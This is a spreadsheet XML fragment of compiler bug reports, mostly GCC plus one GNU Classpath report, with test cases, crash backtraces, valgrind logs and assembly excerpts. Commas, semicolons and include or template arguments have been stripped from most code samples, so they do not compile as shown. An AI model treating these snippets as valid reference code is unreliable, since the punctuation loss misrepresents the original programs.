testcase.c:12:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r162940 - crash
r162456 - OK</t>
  </si>
  <si>
    <t>GCC-36090</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] ppc64 cacoshl miscompilation</t>
  </si>
  <si>
    <t>extern void abort (void)
long double __attribute__ ((noinline)) foo (long double x)
{
  return __builtin_signbit (x) ? 3.1415926535897932384626433832795029L : 0.0
}
int
main (void)
{
  if (foo (-1.0L) != 3.1415926535897932384626433832795029L)
    abort ()
  return 0
}
is miscompiled with -O2 -m64 -mlong-double-128.
Both doubles of the long double return value from foo as the high double
of PI.
The assembly loads this long double value into 0/11 register pair using:
        ld 11.LC1@toc(2)
        ld 0.LC1@toc(2)
In RTL there is actually the +8 for the first insn present but with double negation:
(insn:TI 40 20 39 t.c:5 (set (reg:DI 11 11 [orig:132 D.1237+8 ] [132])
        (mem/u/c/i:DI (plus:DI (reg:DI 2 2)
                (const:DI (minus:DI (symbol_ref/u:DI (*.LC1) [flags 0x2])
                        (const:DI (plus:DI (symbol_ref:DI (*.LCTOC1))
                                (const_int -8 [0xfffffffffffffff8])))))) [2 S8 A64])) 334 {*movdi_internal64} (nil))
(insn 39 40 23 t.c:5 (set (reg:DI 0 0 [orig:131 D.1237 ] [131])
        (mem/u/c/i:DI (plus:DI (reg:DI 2 2)
                (const:DI (minus:DI (symbol_ref/u:DI (*.LC1) [flags 0x2])
                        (symbol_ref:DI (*.LCTOC1))))) [2 S8 A128])) 334 {*movdi_internal64} (expr_list:REG_DEAD (reg:DI 2 2)
        (nil)))
So either the output routines need to be fixed to handle even this weirdo addressing correctly and output 8+.LC1@toc(2) or the pass that generate this needs to be changed to generate something better.</t>
  </si>
  <si>
    <t>GCC-83567</t>
  </si>
  <si>
    <t>Parametrized derived types: Segmentation fault when assigning a function return value</t>
  </si>
  <si>
    <t>Just wrote a small program to test the new parametrized derived types.  Unfortunately I get runtime memory corruption errors and segmentation faults.
% cat pdf.f90
module pdt_m
  implicit none
  type :: vec(k)
     integer len :: k=3
     integer :: foo(k)=[123]
  end type vec
contains
  function addvv(ab) result(c)
    type(vec(k=*)) intent(in) :: a
    type(vec(k=*)) intent(in) :: b
    type(vec(k=a%k)) :: c
    c%foo=a%foo+b%foo
  end function
end module pdt_m
program test_pdt
  use pdt_m
  implicit none
  type(vec) :: uvw
  u%foo=[123]
  v%foo=[234]
  w=addvv(uv)
  print *w
end program test_pdt
% gfortran-8 --version
GNU Fortran (Debian 8-20171223-1) 8.0.0 20171223 (experimental) [trunk revision 255988]
% gfortran-8 pdt.f90 -o pdt -Wall -O3 -g -fcheck=all -Wextra
% ./pdt
           3           0           0           7
*** Error in `./pdt': double free or corruption (fasttop): 0x000055cc59c66630 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bfb)[0x7f303fe40bfb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76fc6)[0x7f303fe46fc6]
/lib/x86_64-linux-gnu/libc.so.6(+0x7780e)[0x7f303fe4780e]
./pdt(+0xdf0)[0x55cc59a0fdf0]
./pdt(+0x89f)[0x55cc59a0f89f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7f303fdf02e1]
./pdt(+0x8da)[0x55cc59a0f8da]
======= Memory map: ========
55cc59a0f000-55cc59a11000 r-xp 00000000 fe:04 1316416                    /home/alpha/src/fortran/23_Parametrized_derived_types/pdt
55cc59c10000-55cc59c11000 r--p 00001000 fe:04 1316416                    /home/alpha/src/fortran/23_Parametrized_derived_types/pdt
55cc59c11000-55cc59c12000 rw-p 00002000 fe:04 1316416                    /home/alpha/src/fortran/23_Parametrized_derived_types/pdt
55cc59c63000-55cc59c84000 rw-p 00000000 00:00 0                          [heap]
7f3038000000-7f3038021000 rw-p 00000000 00:00 0 
7f3038021000-7f303c000000 ---p 00000000 00:00 0 
7f303fbb6000-7f303fbcf000 r-xp 00000000 fe:04 393306                     /lib/x86_64-linux-gnu/libz.so.1.2.8
7f303fbcf000-7f303fdce000 ---p 00019000 fe:04 393306                     /lib/x86_64-linux-gnu/libz.so.1.2.8
7f303fdce000-7f303fdcf000 r--p 00018000 fe:04 393306                     /lib/x86_64-linux-gnu/libz.so.1.2.8
7f303fdcf000-7f303fdd0000 rw-p 00019000 fe:04 393306                     /lib/x86_64-linux-gnu/libz.so.1.2.8
7f303fdd0000-7f303ff63000 r-xp 00000000 fe:04 396680                     /lib/x86_64-linux-gnu/libc-2.24.so
7f303ff63000-7f3040163000 ---p 00193000 fe:04 396680                     /lib/x86_64-linux-gnu/libc-2.24.so
7f3040163000-7f3040167000 r--p 00193000 fe:04 396680                     /lib/x86_64-linux-gnu/libc-2.24.so
7f3040167000-7f3040169000 rw-p 00197000 fe:04 396680                     /lib/x86_64-linux-gnu/libc-2.24.so
7f3040169000-7f304016d000 rw-p 00000000 00:00 0 
7f304016d000-7f30401ab000 r-xp 00000000 fe:04 5512042                    /usr/lib/x86_64-linux-gnu/libquadmath.so.0.0.0
7f30401ab000-7f30403ab000 ---p 0003e000 fe:04 5512042                    /usr/lib/x86_64-linux-gnu/libquadmath.so.0.0.0
7f30403ab000-7f30403ac000 r--p 0003e000 fe:04 5512042                    /usr/lib/x86_64-linux-gnu/libquadmath.so.0.0.0
7f30403ac000-7f30403ad000 rw-p 0003f000 fe:04 5512042                    /usr/lib/x86_64-linux-gnu/libquadmath.so.0.0.0
7f30403ad000-7f30403c4000 r-xp 00000000 fe:04 393267                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f30403c4000-7f30405c3000 ---p 00017000 fe:04 393267                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f30405c3000-7f30405c4000 r--p 00016000 fe:04 393267                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f30405c4000-7f30405c5000 rw-p 00017000 fe:04 393267                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f30405c5000-7f30406c8000 r-xp 00000000 fe:04 396688                     /lib/x86_64-linux-gnu/libm-2.24.so
7f30406c8000-7f30408c7000 ---p 00103000 fe:04 396688                     /lib/x86_64-linux-gnu/libm-2.24.so
7f30408c7000-7f30408c8000 r--p 00102000 fe:04 396688                     /lib/x86_64-linux-gnu/libm-2.24.so
7f30408c8000-7f30408c9000 rw-p 00103000 fe:04 396688                     /lib/x86_64-linux-gnu/libm-2.24.so
7f30408c9000-7f3040b1a000 r-xp 00000000 fe:04 5621520                    /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0
7f3040b1a000-7f3040d19000 ---p 00251000 fe:04 5621520                    /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0
7f3040d19000-7f3040d1a000 r--p 00250000 fe:04 5621520                    /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0
7f3040d1a000-7f3040d1c000 rw-p 00251000 fe:04 5621520                    /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0
7f3040d1c000-7f3040d3f000 r-xp 00000000 fe:04 393406                     /lib/x86_64-linux-gnu/ld-2.24.so
7f3040efc000-7f3040f00000 rw-p 00000000 00:00 0 
7f3040f3b000-7f3040f3f000 rw-p 00000000 00:00 0 
7f3040f3f000-7f3040f40000 r--p 00023000 fe:04 393406                     /lib/x86_64-linux-gnu/ld-2.24.so
7f3040f40000-7f3040f41000 rw-p 00024000 fe:04 393406                     /lib/x86_64-linux-gnu/ld-2.24.so
7f3040f41000-7f3040f42000 rw-p 00000000 00:00 0 
7ffd282a1000-7ffd282c2000 rw-p 00000000 00:00 0                          [stack]
7ffd2834b000-7ffd2834d000 r--p 00000000 00:00 0                          [vvar]
7ffd2834d000-7ffd2834f000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
Program received signal SIGABRT: Process abort signal.
Backtrace for this error:
#0  0x7f30408e6201 in ???
#1  0x7f30408e5443 in ???
#2  0x7f303fe0305f in ???
#3  0x7f303fe02fff in ???
#4  0x7f303fe04429 in ???
#5  0x7f303fe40bff in ???
#6  0x7f303fe46fc5 in ???
#7  0x7f303fe4780d in ???
#8  0x55cc59a0fdef in test_pdt
        at /home/alpha/src/fortran/23_Parametrized_derived_types/pdt.f90:26
#9  0x55cc59a0f89e in main
        at /home/alpha/src/fortran/23_Parametrized_derived_types/pdt.f90:18
zsh: abort      ./pdt
% gdb --args ./pdt
...
Program received signal SIGABRT Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
51      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1  0x00007ffff6ec142a in __GI_abort () at abort.c:89
#2  0x00007ffff6efdc00 in __libc_message (do_abort=do_abort@entry=2 fmt=fmt@entry=0x7ffff6ff2d78 *** Error in `%s': %s: 0x%s ***\n)
    at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff6f03fc6 in malloc_printerr (action=3 str=0x7ffff6ff2ed0 double free or corruption (fasttop) ptr= ar_ptr=)
    at malloc.c:5049
#4  0x00007ffff6f0480e in _int_free (av=0x7ffff7224b00  p=0x55555575a620 have_lock=0) at malloc.c:3905
#5  0x0000555555554df0 in test_pdt () at pdt.f90:26
#6  0x000055555555489f in main (argc=argc@entry=1 argv=0x7fffffffe734) at pdt.f90:18
#7  0x00007ffff6ead2e1 in __libc_start_main (main=0x555555554880  argc=1 argv=0x7fffffffe468 init= fini= 
    rtld_fini= stack_end=0x7fffffffe458) at ../csu/libc-start.c:291
#8  0x00005555555548da in _start ()
% valgrind ./pdt
% valgrind ./pdt        
==7993== Memcheck a memory error detector
==7993== Copyright (C) 2002-2017 and GNU GPL'd by Julian Seward et al.
==7993== Using Valgrind-3.13.0 and LibVEX rerun with -h for copyright info
==7993== Command: ./pdt
==7993== 
==7993== Invalid read of size 4
==7993==    at 0x5040B40: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==7993==    by 0x5040D50: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==7993==    by 0x50454DD: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==7993==    by 0x5046194: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==7993==    by 0x108DCD: MAIN__ (pdt.f90:25)
==7993==    by 0x10889E: main (pdt.f90:18)
==7993==  Address 0x5fa1bb0 is 0 bytes inside a block of size 12 free'd
==7993==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==7993==    by 0x108AF0: __pdt_m_MOD_addvv (pdt.f90:14)
==7993==    by 0x108D23: MAIN__ (pdt.f90:24)
==7993==    by 0x10889E: main (pdt.f90:18)
==7993==  Block was alloc'd at
==7993==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==7993==    by 0x108A30: __pdt_m_MOD_addvv (pdt.f90:14)
==7993==    by 0x108D23: MAIN__ (pdt.f90:24)
==7993==    by 0x10889E: main (pdt.f90:18)
==7993== 
           3           3           5           7
==7993== Invalid free() / delete / delete[] / realloc()
==7993==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==7993==    by 0x108DEF: MAIN__ (pdt.f90:26)
==7993==    by 0x10889E: main (pdt.f90:18)
==7993==  Address 0x5fa1bb0 is 0 bytes inside a block of size 12 free'd
==7993==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==7993==    by 0x108AF0: __pdt_m_MOD_addvv (pdt.f90:14)
==7993==    by 0x108D23: MAIN__ (pdt.f90:24)
==7993==    by 0x10889E: main (pdt.f90:18)
==7993==  Block was alloc'd at
==7993==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==7993==    by 0x108A30: __pdt_m_MOD_addvv (pdt.f90:14)
==7993==    by 0x108D23: MAIN__ (pdt.f90:24)
==7993==    by 0x10889E: main (pdt.f90:18)
==7993== 
==7993== 
==7993== HEAP SUMMARY:
==7993==     in use at exit: 12 bytes in 1 blocks
==7993==   total heap usage: 25 allocs 25 frees 13544 bytes allocated
==7993== 
==7993== LEAK SUMMARY:
==7993==    definitely lost: 12 bytes in 1 blocks
==7993==    indirectly lost: 0 bytes in 0 blocks
==7993==      possibly lost: 0 bytes in 0 blocks
==7993==    still reachable: 0 bytes in 0 blocks
==7993==         suppressed: 0 bytes in 0 blocks
==7993== Rerun with --leak-check=full to see details of leaked memory
==7993== 
==7993== For counts of detected and suppressed errors rerun with: -v
==7993== ERROR SUMMARY: 4 errors from 2 contexts (suppressed: 0 from 0)
% valgrind --leak-check=full -v ./pdt
...
==8016== Invalid read of size 4
==8016==    at 0x5040B40: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==8016==    by 0x5040D50: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==8016==    by 0x50454DD: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==8016==    by 0x5046194: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==8016==    by 0x108DCD: MAIN__ (pdt.f90:25)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016==  Address 0x5fa1bb0 is 0 bytes inside a block of size 12 free'd
==8016==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==8016==    by 0x108AF0: __pdt_m_MOD_addvv (pdt.f90:14)
==8016==    by 0x108D23: MAIN__ (pdt.f90:24)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016==  Block was alloc'd at
==8016==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==8016==    by 0x108A30: __pdt_m_MOD_addvv (pdt.f90:14)
==8016==    by 0x108D23: MAIN__ (pdt.f90:24)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016== 
           3           3           5           7
==8016== Invalid free() / delete / delete[] / realloc()
==8016==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==8016==    by 0x108DEF: MAIN__ (pdt.f90:26)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016==  Address 0x5fa1bb0 is 0 bytes inside a block of size 12 free'd
==8016==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==8016==    by 0x108AF0: __pdt_m_MOD_addvv (pdt.f90:14)
==8016==    by 0x108D23: MAIN__ (pdt.f90:24)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016==  Block was alloc'd at
==8016==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==8016==    by 0x108A30: __pdt_m_MOD_addvv (pdt.f90:14)
==8016==    by 0x108D23: MAIN__ (pdt.f90:24)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016== 
==8016== 
==8016== HEAP SUMMARY:
==8016==     in use at exit: 12 bytes in 1 blocks
==8016==   total heap usage: 25 allocs 25 frees 13544 bytes allocated
==8016== 
==8016== Searching for pointers to 1 not-freed blocks
==8016== Checked 101576 bytes
==8016== 
==8016== 12 bytes in 1 blocks are definitely lost in loss record 1 of 1
==8016==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==8016==    by 0x108CC4: MAIN__ (pdt.f90:26)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016== 
==8016== LEAK SUMMARY:
==8016==    definitely lost: 12 bytes in 1 blocks
==8016==    indirectly lost: 0 bytes in 0 blocks
==8016==      possibly lost: 0 bytes in 0 blocks
==8016==    still reachable: 0 bytes in 0 blocks
==8016==         suppressed: 0 bytes in 0 blocks
==8016== 
==8016== ERROR SUMMARY: 5 errors from 3 contexts (suppressed: 0 from 0)
==8016== 
==8016== 1 errors in context 1 of 3:
==8016== Invalid free() / delete / delete[] / realloc()
==8016==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==8016==    by 0x108DEF: MAIN__ (pdt.f90:26)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016==  Address 0x5fa1bb0 is 0 bytes inside a block of size 12 free'd
==8016==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==8016==    by 0x108AF0: __pdt_m_MOD_addvv (pdt.f90:14)
==8016==    by 0x108D23: MAIN__ (pdt.f90:24)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016==  Block was alloc'd at
==8016==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==8016==    by 0x108A30: __pdt_m_MOD_addvv (pdt.f90:14)
==8016==    by 0x108D23: MAIN__ (pdt.f90:24)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016== 
==8016== 
==8016== 3 errors in context 2 of 3:
==8016== Invalid read of size 4
==8016==    at 0x5040B40: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==8016==    by 0x5040D50: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==8016==    by 0x50454DD: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==8016==    by 0x5046194: ??? (in /usr/lib/x86_64-linux-gnu/libgfortran.so.5.0.0)
==8016==    by 0x108DCD: MAIN__ (pdt.f90:25)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016==  Address 0x5fa1bb0 is 0 bytes inside a block of size 12 free'd
==8016==    at 0x4C2CE1B: free (vg_replace_malloc.c:530)
==8016==    by 0x108AF0: __pdt_m_MOD_addvv (pdt.f90:14)
==8016==    by 0x108D23: MAIN__ (pdt.f90:24)
==8016==    by 0x10889E: main (pdt.f90:18)
==8016==  Block was alloc'd at
==8016==    at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==8016==    by 0x108A30: __pdt_m_MOD_addvv (pdt.f90:14)
==8016==    by 0x108D23: MAIN__ (pdt.f90:24)
==8016==    by 0x10889E: main (pdt.f90:18)
...</t>
  </si>
  <si>
    <t>berke.durak</t>
  </si>
  <si>
    <t>CLASSPATH-29526</t>
  </si>
  <si>
    <t>NIO Class gnu.java.nio.ChannelInputStream produces spurious EOS indications</t>
  </si>
  <si>
    <t>The gnu.java.nio.ChannelInputStream implementation class which adapts a ReadableByteChannel to an InputStream is broken.  The return value (line 77) fails to use a 0xFF mask to prevent sign extension of the byte value being returned.  If binary data is being read and the data stream contains a hex 0xFF value then an integer value of -1 is returned (because the byte value is sign-extended) and the caller sees this as end-of-stream.
In addition the implementation of this class is very inefficient for transferring more than a trivial amount of data.
Included below is a more robust and efficient implementation of ChannelInputStream.  Note that the complementary class ChannelOutputStream would also benefit from a similar block-transfer implementation.
============
public final class ChannelInputStream extends InputStream
{
	private final ReadableByteChannel channel
	public ChannelInputStream (ReadableByteChannel channel)
	{
		this.channel = channel
	}
	public int read (byte b[]) throws IOException
	{
		return read (b 0 b.length)
	}
	public int read (byte bytes[] int off int len) throws IOException
	{
		if (len == 0) return 0
		if ((off  bytes.length) || (len &lt; 0) ||
			((off + len) &gt; bytes.length) || ((off + len) &lt; 0))
		{
			throw new IndexOutOfBoundsException()
		}
		ByteBuffer buffer = ByteBuffer.wrap (bytes off len)
		buffer.position (off)
		buffer.limit (Math.min (off + len buffer.capacity()))
		return (channel.read (buffer))
	}
	public int read() throws IOException
	{
		byte [] buf = new byte [1]
		int rc = read (buf 0 1)
		if (rc == -1) return -1
		return buf [0] 
	}
}</t>
  </si>
  <si>
    <t>GCC-12863</t>
  </si>
  <si>
    <t>[3.4 regression] basic block reordering fails for fallthru of casesi</t>
  </si>
  <si>
    <t>The following error occurs in a native build on vax-dec-ultrix4.3:
stage1/xgcc -Bstage1/ -B/usr/local/vax-dec-ultrix4.3/bin/   -g -O2 -DIN_GCC   -W
 -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-l
ong-long -Werror -fno-common   -DHAVE_CONFIG_H    -I. -I. -I../../gcc/gcc -I../.
./gcc/gcc/. -I../../gcc/gcc/../include  -c insn-recog.c \
  -o insn-recog.o
/usr/tmp//ccIivLi7.s: Assembler messages:
/usr/tmp//ccIivLi7.s:5966: Error: can't resolve `L1074' {unknown section} - `L10
86' {text section}
Looking at this problem with a cross compiler built on hppa1.1-hp-hpux10.20
I see exactly the same problem and find that the code label for L1074 disappears
in bbro pass.  Looking at the assembler output with and without basic block
reordering I see:
With basic block reordering:
        movzwl (r6)r0
        casel r0$114$5
L1086:
        .word L1084-L1086
        .word L1074-L1086
        .word L1078-L1086
        .word L1076-L1086
        .word L1082-L1086
        .word L1080-L1086
        .stabd  6804406
        movl 4(r7)r8
        jbr L1392
Without basic block reordering:
        movzwl (r6)r0
        casel r0$114$5
L1086:
        .word L1084-L1086
        .word L1074-L1086
        .word L1078-L1086
        .word L1076-L1086
        .word L1082-L1086
        .word L1080-L1086
L1074:
        jbr L1385
L1076:
        .stabd  6803809
        movl 4(r6)r10
        .stabd  6803810
        ...
L1385:
        .stabd  6804406
        movl 4(r7)r8
        .stabd  6804407
        jbr L1062
We have lost the label at the end of the address difference table when basic
block reordering is in effect.  Either it should remain as L1074 or it should
change to L1385 and the table updated.  The right code appears to have been
placed in the fallthru.</t>
  </si>
  <si>
    <t>GCC-39898</t>
  </si>
  <si>
    <t>[4.5 regression] Revision 146763 caused g++.dg/tree-ssa/ehcleanup-1.C</t>
  </si>
  <si>
    <t>Revision 146763:
http://gcc.gnu.org/ml/gcc-cvs/2009-04/msg01405.html
caused:
FAIL: g++.dg/tree-ssa/ehcleanup-1.C scan-tree-dump-times ehcleanup1 Empty EH handler 1
on x86.</t>
  </si>
  <si>
    <t>GCC-4459</t>
  </si>
  <si>
    <t>g++ 3.0.1 resolves to wrong const overload when using access adjustment</t>
  </si>
  <si>
    <t>When access adjustment is used in the body of a class for member functions that are overload on const all calls resolve (incorrectly) to the const overload.
Release:
3.0.1
Environment:
g++ 3.0.1 on Solaris 8
How-To-Repeat:
Here is a short test case:
#include 
using namespace std
struct A {
  void foo() { cout &lt;&lt; non const &lt;&lt; endl  }
  void foo() const { cout &lt;&lt; const &lt;&lt; endl  }
}
struct B : private A {
    using A::foo
}
int main() {
  B b
  b.foo()
  return 0
}  
output:
const
Following is the g++ compile line with the verbose and save temps option:
$ g++ -v -save-temps -c access_adj.cpp
Reading specs from /package/1/compilers/g++/3.0.1/bin/../lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/specs
Configured with: ../gcc-3.0.1/configure --prefix=/tmp/gcc --enable-threads
Thread model: posix
gcc version 3.0.1
GNU CPP version 3.0.1 (cpplib) (sparc)
ignoring nonexistent directory /package/1/compilers/g++/3.0.1/sparc-sun-solaris2.8/include
ignoring nonexistent directory /tmp/gcc/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/../../../../include/g++-v3
ignoring nonexistent directory /tmp/gcc/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/../../../../include/g++-v3/sparc-sun-solaris2.8
ignoring nonexistent directory /tmp/gcc/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/../../../../include/g++-v3/backward
ignoring nonexistent directory /tmp/gcc/include
ignoring nonexistent directory /tmp/gcc/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include
ignoring nonexistent directory /tmp/gcc/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/../../../../sparc-sun-solaris2.8/include
#include ... search starts here:
#include  search starts here:
 /package/1/compilers/g++/3.0.1/include/g++-v3
 /package/1/compilers/g++/3.0.1/include/g++-v3/sparc-sun-solaris2.8
 /package/1/compilers/g++/3.0.1/include/g++-v3/backward
 /package/1/compilers/g++/3.0.1/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include
 /usr/include
End of search list.
 /package/1/compilers/g++/3.0.1/bin/../lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/cc1plus -fpreprocessed access_adj.ii -quiet -dumpbase access_adj.cpp -version -o access_adj.s
GNU CPP version 3.0.1 (cpplib) (sparc)
GNU C++ version 3.0.1 (sparc-sun-solaris2.8)
        compiled by GNU C version 2.95.2 19991024 (release).
 /usr/ccs/bin/as -V -Qy -s -o access_adj.o access_adj.s
/usr/ccs/bin/as: Sun WorkShop 6 99/08/18
$ g++ -o access_adj access_adj.o
$ access_adj
const</t>
  </si>
  <si>
    <t>yoder</t>
  </si>
  <si>
    <t>GCC-48265</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] [C++0x] ICE: SIGSEGV (recursion in value_dependent_expression_p) when variable is used uninitialised</t>
  </si>
  <si>
    <t>Looks similiar to PR46870 but this code is valid:
------- testcase.C -------
template  struct S
{
  S () { int i = i i }
}
--------------------------
Compiler output:
$ gcc -std=gnu++0x testcase.C
Program received signal SIGSEGV Segmentation fault.
0x000000000054e883 in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18065
18065     if (DECL_P (expression) &amp;&amp; type_dependent_expression_p (expression))
(gdb) bt
#0  0x000000000054e883 in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18065
#1  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
#2  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
#3  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
#4  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
#5  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
#6  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
#7  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
#8  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
#9  0x000000000054ea7e in value_dependent_expression_p (expression=) at /mnt/svn/gcc-trunk/gcc/cp/pt.c:18233
...</t>
  </si>
  <si>
    <t>GCC-23046</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE in set_value_range at tree-vrp.c:191</t>
  </si>
  <si>
    <t>While testing gcc-4.1-20050716 I ran across the error
bar.cc: In static member function 'static std::string
Blort::ConstructFullName(const std::string&amp; const std::vector&lt;std::string
std::allocator &gt;* const std::string&amp; Blort::TwoValuedEnumType)':
bar.cc:1214: internal compiler error: in set_value_range at tree-vrp.c:191
This was reproducible with just -O2 no other compiler flags were needed
to get the ICE.  (-O wasn't enough.)
It might be hard to provide a sanitized testcase
but I can try if that's needed to track this down.</t>
  </si>
  <si>
    <t>GCC-50157</t>
  </si>
  <si>
    <t>[C++0x] Non-silent SFINAE in new expression with explicit conversion</t>
  </si>
  <si>
    <t>gcc 4.7.0 20110813 (experimental) in C++0x mode rejects the following code:
---
template
T val()
template&lt;class T class Arg class =
  decltype(::new T(val()))
&gt;
auto test(int) -&gt; char
template
auto test(...) -&gt; char (
struct P {
  explicit operator bool() // (#13)
}
typedef decltype(test(0)) type // OK
typedef decltype(test(0)) type2 // Error (#17)
---
17|error: invalid user-defined conversion from 'P' to 'float' [-fpermissive]|
13|note: candidate is: P::operator bool() |
13|note:   return type 'bool' of explicit conversion function cannot be converted to 'float' with a qualification conversion|
17|error: invalid user-defined conversion from 'P' to 'float' [-fpermissive]|
13|note: candidate is: P::operator bool() |
13|note:   return type 'bool' of explicit conversion function cannot be converted to 'float' with a qualification conversion|
||=== Build finished: 6 errors 0 warnings ===|
It is correct that the P-&gt;float conversion would be ill-formed but this needs to be handled silently and the program should be accepted. The compiler seems to have a special problem here with the combination of an explicit conversion function in P and the otherwise feasible bool-&gt;float conversion in implicit contexts.</t>
  </si>
  <si>
    <t>GCC-52882</t>
  </si>
  <si>
    <t>ICE in memory_address_length at config/i386/i386.c:23373</t>
  </si>
  <si>
    <t>[regehr@dyson r1]$ current-gcc -c -O small.c
small.c: In function 'fn3':
small.c:14:1: internal compiler error: in memory_address_length at config/i386/i386.c:23373
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@dyson r1]$ cat small.c 
struct S1 {
  int f0
  int f1
}
int fn1 ()
void fn2 (struct S1)
void
fn3 () {
  struct S1 a = { 1 0 }
  if (fn1 ())
    fn2 (a)
  for ( a.f1) {
  }
}
[regehr@dyson r1]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r186167-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r186167-install --program-prefix=r186167- --enable-languages=cc++
Thread model: posix
gcc version 4.8.0 20120405 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-37784</t>
  </si>
  <si>
    <t>inefficient code for double compare double yielding double</t>
  </si>
  <si>
    <t>The function:
double dfunc_001 ( const double a const double b) { return a &gt; b }
yields the x86_64 code:
        cmpltsd %xmm0 %xmm1
        movapd  %xmm1 %xmm0
        movsd   .LC1(%rip) %xmm1
        andpd   %xmm0 %xmm1
        xorpd   %xmm2 %xmm2
        andnpd  %xmm2 %xmm0
        orpd    %xmm1 %xmm0
        ret
.LC1:
        .long   0
        .long   1072693248
Where LC1 is the fp constant +1.0
The 3 instruction sequence preceding the ret (eg xorpdandnpdorpd) is not needed.  The xorpd generates a 0 which is anded with something to yield a 0 which is or'ed in with the value (+0.0 or +1.0) to yield the result.
Similar illness is seen for the other compares built around cmpsd variants.
Some improvement is seen when compiling -O3 but in that case there are 2 unneeded instructions.</t>
  </si>
  <si>
